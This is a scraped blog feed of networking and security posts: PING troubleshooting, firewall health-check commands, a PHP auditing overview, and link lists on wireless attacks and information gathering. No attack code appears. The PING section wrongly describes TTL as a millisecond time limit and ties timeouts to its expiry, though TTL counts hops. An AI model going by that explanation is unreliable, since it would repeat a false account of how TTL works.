a few basic tests, you can gain a lot of insight into the problem at hand. The tests that I am about to show you will rarely show you the cause of the problem, but they will help to narrow things down so that you will know where to begin the troubleshooting process.<br /><br /><span style="font-weight:bold;">PING</span><br /><br />PING is probably the simplest TCP/IP diagnostic utility ever created, but the information that it can provide you with is invaluable. Simply put, PING tells you whether or not your workstation can communicate with another machine.<br /><br />The first thing that I recommend doing is opening a Command Prompt window, and then entering the PING command, followed by the IP address of the machine that you are having trouble communicating with. When you do, the machine that you have specified should produce four replies, as shown in Figure A.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.windowsnetworking.com/img/upl/image0021218182403357.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 284px;" src="http://www.windowsnetworking.com/img/upl/image0021218182403357.jpg" border="0" alt="" /></a><br />Figure A: The specified machine should generate four replies<br /><br />The responses essentially tell you how long it took the specified machine to respond with thirty two bytes of data. For example, in Figure A, each of the four responses were received in less than four milliseconds.<br /><br />Typically, when you issue the PING command, one of four things will happen, each of which has its own meaning.<br /><br />The first thing that can happen is that the specified machine will produce four replies. This indicates that the workstation is able to communicate with the specified host at the TCP/IP level.<br /><br />The second thing that can happen is that all four requests time out, as shown in Figure B. If you look at Figure A, you will notice that each response ends in TTL=128. TTL stands for Time To Live. What this means is that each of the four queries and responses must be completed within 128 milliseconds. The TTL is also decremented once for each hop on the way back. A hop occurs when a packet moves from one network to another. I will be talking a lot more about hops later on in this series.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.windowsnetworking.com/img/upl/image0041218182403373.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 284px;" src="http://www.windowsnetworking.com/img/upl/image0041218182403373.jpg" border="0" alt="" /></a><br />Figure B: If all four requests time out, it could indicate a communications failure<br /><br />At any rate, if all four requests have timed out, it means that the TTL expired before the reply was received. This can mean one of three things:<br /><br />Communications problems are preventing packets from flowing between the two machines. This could be caused by a disconnected cable, a bad routing table, or a number of other issues.<br />Communications are occurring, but are too slow for PING to acknowledge. This can be caused by extreme network congestion, or by faulty network hardware or wiring.<br />Communications are functional, but a firewall is blocking ICMP traffic. PING will not work unless the destination machine’s firewall (and any firewalls between the two machines) allow ICMP echos.<br />A third thing that can happen when you enter the PING command is that some replies are received, while others time out. This can point to bad network cabling, faulty hardware, or extreme network congestion.<br /><br />The fourth thing that can occur when pinging a host is that you receive an error similar to the one that is shown in Figure C.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.windowsnetworking.com/img/upl/image0061218182403373.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 288px;" src="http://www.windowsnetworking.com/img/upl/image0061218182403373.jpg" border="0" alt="" /></a><br />Figure C: This type of error indicates that TCP/IP is not configured correctly<br /><br />The PING: Transmit Failed error indicates that TCP/IP is not configured correctly on the machine on which you are trying to enter the PING command. This particular error is specific to Vista though. Older versions of Windows produce an error when TCP/IP is configured incorrectly, but the error message is “Destination Host Unreachable”<br /><br /><span style="font-weight:bold;">What if the PING is Successful?</span><br /><br />Believe it or not, it is not uncommon for a ping to succeed, even though two machines are having trouble communicating with each other. If this happens, it means that the underlying network infrastructure is good, and that the machines are able to communicate at the TCP/IP level. Typically, this is good news, because it means that the problem that is occurring is not very serious.<br /><br />If normal communications between two machines are failing, but the two machines can PING each other successfully (be sure to run the PING command from both machines), then there is something else that you can try. Rather than pinging the network host by IP address, try replacing the IP address with the host’s fully qualified domain name, as shown in Figure D.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.windowsnetworking.com/img/upl/image0081218182416498.jpg"><img style="cursor:pointer; cursor:hand;width: 574px; height: 284px;" src="http://www.windowsnetworking.com/img/upl/image0081218182416498.jpg" border="0" alt="" /></a><br />Figure D: Try pinging the network host by its fully qualified domain name<br /><br />If you are able to ping the machine by its IP address, but not by its fully qualified domain name, then you most likely have a DNS issue. The workstation may be configured to use the wrong DNS server, or the DNS server may not contain a host record for the machine that you are trying to ping.<br /><br />If you look at Figure D, you can see that the machine’s IP address is listed just to the right of its fully qualified domain name. This proves that the machine was able to resolve the fully qualified domain name. Make sure that the IP address that the name was resolved to is correct. If you see a different IP address than the one that you expected, then you may have an incorrect DNS host record.<br /><br /><span style="font-weight:bold;">Conclusion</span><br /><br />In this article, I have shown you some steps for testing basic connectivity between two machines. In the next article in the series, I will show you some more techniques that you can use in the troubleshooting process.<br /><br />**************************************************<br />Published: Aug 14, 2008<br />Updated: Sep 26, 2008<br />Section: Articles & Tutorials :: Network Troubleshooting<br />Author: Brien M. Posey<br />Rating: 3.6/5 - 32 Votes<br />If you would like to read other parts to this article please go to:<br /><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part2.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 2)</a><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part3.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 3)</a><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part4.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 4)</a><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part5.html" target="_blank">Troubleshooting Connectivity Problems on Windows Networks (Part 5)</a><br /><br /><a href="http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html" target="_blank">http://www.windowsnetworking.com/articles_tutorials/Troubleshooting-Connectivity-Problems-Windows-Networks-Part1.html</a><br /><br /><a href="http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html" target="_blank">http://searchnetworking.techtarget.com/tip/0,289483,sid7_gci1355527_mem1,00.html</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-84619099833178133232009-04-25T01:38:00.000-07:002009-04-25T02:41:34.248-07:0020 ways to php Source code fuzzing (Auditing)20 ways to php Source code fuzzing (Auditing)<br /><br />Hello .<br /><br />This article is only for who attend php as well and really knowing how to program In PHP.<br /><br />When we talk about PHP Vulnerability discovery, we forget this Question:<br />What types of bugs?<br /><br />When we can answer this Question, we will gain to find vulnerability as well as drink some water.<br /><br />Reading in this article :<br /><br />Section 1 : (20 ways to PHP source code Auditing - PHP Fuzzing)<br />1- Cross Site Scripting<br />2- SQL Injection [medium]<br />3- HTTP Response Splitting [Medium]<br />4- Dynamic Evaluation Vulnerabilities [High]<br />5- Process Control / PHP Code Injection (HIGH)<br />6- Local / Remote file inclusion (High)<br />7 – File Management (HIGH)<br />8- Buffer overflows (High, But Hard Usage)<br />9- Cookie / Session injection / Fixation / [High]<br />10 – Denial Of service [Medium, But Hard Assessment]:<br />11 - XPath Injection [XML Functions]<br />12 - Often Misused: File Uploads (High)<br />13 - Un-Authorize summon of Functionality / File (Medium)<br />14 - Authentication Bypass with Brute Force (Low)<br />15 - Insecure Randomness Session / Cookie / Backup files (Medium)<br />16 - Informative details in HTML Comments (Low)<br />17 - Default unnecessary installation files (medium)<br />18 – Regular Expression Vulnerability (High)<br />19 – Resource Injection (Medium)<br />20 – Week Password / Encryption: (Low)<br /><br />Section 2:<br />Automatic PHP Auditor source code<br /><br />This article is not a full reference about PHP source code security review (a.k.a auditing) but I tried to do this work in my short time as well. So please take my apology about all of mistakes (maybe) I made during completing this article. I’m not sure but maybe I’ve release future version of this article that contain a few more advanced methods.<br /><br />Here is some of future talk and topics may I add this article in next version:<br />1- More Real world Attack with Description<br />2- PHPIDS Defense.<br />3- More Dangerous Functions: CURL – socket – creat_function & ….<br />4- Talk About pear functions and security of used.<br />5- Information About Books of PHP Securea Coding.<br />6- And ETC<br /><br />Download :<br /><br /><a href="http://abysssec.com/blog/wp-content/uploads/2009/03/php-fuzzing-auditing-version-10.pdf" target="_blank">php-fuzzing-auditing-version-1.0</a><br /><br />thanks.<br /><br />Daphne<br /><br /><a href="http://abysssec.com/blog/2009/03/php_fuzz_audit/" target="_blank">http://abysssec.com/blog/2009/03/php_fuzz_audit/</a>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-456962442660639401.post-30158365641887809302009-04-20T18:52:00.000-07:002009-04-20T19:01:36.416-07:00Information GatheringNew School Information New School Information Gathering Gathering<br /><a href="http://www.toorcon.org/tcx/17_Gates.pdf" target="_blank">http://www.toorcon.org/tcx/17_Gates.pdf</a><br />@<br /><a href="http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf" target="_blank">http://www.carnal0wnage.com/research/newschoolinfogathering-chicagocon.pdf</a><br /><br />Information Gathering: The Complete Documentation<br /><a href="http://www.l0t3k.org/security/docs/gathering/" target="_blank">http://www.l0t3k.org/security/docs/gathering/</a><br /><br />Passive Information Gathering Techniques<br /><a href="http://seclists.org/basics/2004/Feb/0073.html" target="_blank">http://seclists.org/basics/2004/Feb/0073.html</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-53021516266645405612009-04-19T00:00:00.000-07:002009-04-19T00:07:11.141-07:00Caffe Latte attack<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/5A-9jAvvQpY&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/5A-9jAvvQpY&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br /><br /><a href="http://www.security-freak.net/toorcon/cafe-latte-wireless-attack.html" target="_blank">http://www.security-freak.net/toorcon/cafe-latte-wireless-attack.html</a><br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/7eU8y_7W50Q&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/7eU8y_7W50Q&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br /><br />The Caffe Latte Attack: How It Works—and How to Block It<br />By Lisa Phifer<br />December 12, 2007<br /><br /><a href="http://www.wi-fiplanet.com/tutorials/article.php/3716241" target="_blank">http://www.wi-fiplanet.com/tutorials/article.php/3716241</a><br /><br /><a href="http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2">http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-84413104942017284732009-04-18T23:50:00.000-07:002009-04-18T23:53:49.587-07:00Wireless Attacks and Penetration TestingWireless Attacks and Penetration Testing (part 1 of 3)<br />Jonathan Hassell 2004-06-03<br /><a href="http://www.securityfocus.com/infocus/1783" target="_blank">http://www.securityfocus.com/infocus/1783</a><br /><br />Wireless Attacks and Penetration Testing (part 2 of 3)<br />Jonathan Hassell 2004-06-14<br /><a href="http://www.securityfocus.com/infocus/1785" target="_blank">http://www.securityfocus.com/infocus/1785</a><br /><br />Wireless Attacks and Penetration Testing (part 3 of 3)<br />Jonathan Hassell 2004-07-26<br /><a href="http://www.securityfocus.com/infocus/1792" target="_blank">http://www.securityfocus.com/infocus/1792</a><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.securityfocus.com/pen-test/images/thumb_hassell-fig1-part2-airsnort.gif"><img style="cursor:pointer; cursor:hand;width: 600px; height: 450px;" src="http://www.securityfocus.com/pen-test/images/thumb_hassell-fig1-part2-airsnort.gif" border="0" alt="" /></a><br />Figure 1: Sniffing packets with AirSnortUnknownnoreply@blogger.com1tag:blogger.com,1999:blog-456962442660639401.post-49245016067122896802009-03-28T17:49:00.000-07:002009-04-21T00:49:15.369-07:00Checkpoint Firewall - IPSO Standard Health CheckGUI = Smart View Monitor<br /><br />CLI as below<span style="font-weight:bold;"><br /><pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">fw stat<br />cpstat fw</span><br /><span style="font-weight:bold;">cphaprob stat</span><br /></pre><br />to check the HA state<br /><br />For Nokia Box, run<pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;"><span style="font-weight:bold;">clish<br />show vrrp</span><br /></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-54155303577361375812009-03-27T18:30:00.000-07:002009-03-27T18:31:19.925-07:00Checkpoint Firewall - Fw Monitor[PDF] <br />How to use fw monitor<br />http://www.checkpoint.com/techsupport/downloads/html/ethereal/fw_monitor_rev1_01.pdf<br /><br />[DOC] <br />FW MONITOR<br />www.cpug.org/check_point_resources/FW%20MONITOR_expert.doc<br /><br />[PDF] <br />Fw Monitor<br />www.nokia.com/NOKIA_COM_1/About_Nokia/Press/White_Papers/pdf_files/technicalwhitepaper_fwmonitoring.pdfUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-73857453826779186802009-03-27T03:12:00.000-07:002009-04-21T00:50:15.657-07:00grep pix log<pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">cat pix.log | grep "Sep 26 20:" | grep -v Teardown | grep -v Built| grep -v Deny | grep -v Accessed| grep -v access-list | grep -v Inbound | grep -v Deny | grep -v Accessed| grep -v access-list | grep "PIX-1-"<br /></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-23094368132655199132009-03-26T19:13:00.000-07:002009-04-21T00:53:32.907-07:00Cisco Pix Firewall - Standard Health Check1.<pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh fail<br /></pre>- untuk cek yg mana primary atau secondary yg tengah active atau standby<br />- bila tarikh last failover<br />- cek status sume fw interface<br /><br />2.<pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh conn count<br /></pre>- cek bape byk bilangan connection, kalau banyak betulla tu fw tengah pass traffic<br /><br />3. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh conn</pre>- nak tengok connection<br /><br />4. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh mem</pre>- cek fw memory <br /><br />5. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh cpu usage</pre>- cek fw cpu utilization<br /><br />6. <pre style="border: thin solid rgb(0, 51, 51); padding: 5px; overflow: auto; font-family: courier; background-color: rgb(24, 24, 24); font-size: 12px; color: rgb(255, 255, 255); line-height: 14px; width: 90%;">sh int</pre>- cek sume interface kat fwUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-4726029319637574412009-03-07T19:57:00.000-08:002009-03-07T20:00:32.308-08:00Vulnerability Assessment for SQL Injection<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHPMopb2IpBaZjIvegUpVPjo3TtZ5CgBoot3YGYbZjWCG1tWppPy92XkcXUNxcOTTUBibkMguZXMvr9LsD2flT1e4NnWtNyQfNIMmqqDgZFYjKvyhuSmqrWwdPwhgk3IYZwNuRYy5_qDGZ/s1600-h/SQL_Injection_assess_vulnerability.gif"><img style="cursor:pointer; cursor:hand;width: 279px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHPMopb2IpBaZjIvegUpVPjo3TtZ5CgBoot3YGYbZjWCG1tWppPy92XkcXUNxcOTTUBibkMguZXMvr9LsD2flT1e4NnWtNyQfNIMmqqDgZFYjKvyhuSmqrWwdPwhgk3IYZwNuRYy5_qDGZ/s320/SQL_Injection_assess_vulnerability.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5310661473823165330" /></a><br /><br /><a href="http://www.zubrag.com/tools/sql-injection-test.php" target="_blank">Online Tools - SQL Injection</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-86700260600398151642009-02-14T21:10:00.000-08:002009-04-18T09:43:30.612-07:00One of my student just copy paste everything from here for their wireless assignment.. got u! :P<br /><br /><a href="http://technet.microsoft.com/en-us/library/bb457019.aspx" target="_blank">http://technet.microsoft.com/en-us/library/bb457019.aspx</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-19317205107836222332009-02-14T17:24:00.000-08:002009-02-14T17:25:33.379-08:002.4GHz vs. 5GHz Deployment ConsiderationsWhen deploying a wireless LAN, companies must make a decision on whether to use network interface cards (NICs) and access points designed to operate in the 2.4GHz or 5GHz band (or both). Not too long ago the choice of frequency band was easy, when only 2.4GHz (i.e., 802.11b) products were available. Now, 802.11b and 802.11g products are both available that operate in the 2.4GHz band, while 802.11a use the 5GHz band. This can cause confusion when designing a WLAN, so let's take a look at what you need to consider when making this critical resolution.<br /><br /><a href="http://www.wi-fiplanet.com/tutorials/article.php/1569271">http://www.wi-fiplanet.com/tutorials/article.php/1569271</a>Unknownnoreply@blogger.com0